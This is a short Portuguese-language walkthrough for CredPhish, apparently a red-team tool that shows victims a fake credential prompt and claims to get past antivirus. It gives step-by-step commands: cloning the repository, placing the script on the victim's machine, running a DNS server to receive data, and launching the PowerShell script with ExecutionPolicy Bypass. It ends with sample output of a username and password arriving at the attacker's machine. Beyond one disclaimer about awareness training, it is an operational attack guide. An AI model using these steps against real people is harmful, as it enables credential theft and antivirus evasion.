O CredPhish realiza a captura de usuários e senhas e utiliza mecanismos que visam bypassar as camadas de proteção dos Antivírus.
É recomendável utilizar esta ferramenta apenas para ações de conscientização de segurança a fim de destacar os riscos que todos estamos expostos.
🔴 O uso indevido desta ferramenta é de sua total responsabilidade e está sujeito as penalizações prevista na Lei 12.737.
Realize o clone do projeto CredPhish e liste o conteúdo do diretório :
Linuxgit clone https://github.com/tokyoneon/CredPhish cd CredPhish/ ls -l
Envie o script credphish.py para a máquina da Vítima e altera as linhas 2 e 6 :
Execute o script dns_server.py
Linux./dns_server.py
Execute o script credphish.ps1 e preencha os campos :
PowerShellPowerShell.exe -ExecutionPolicy Bypass .\credphish.ps1
O Usuário e a Senha são enviados para a máquina do Atacante :
LinuxREDTEAM[[email protected]:P@ssw0rd]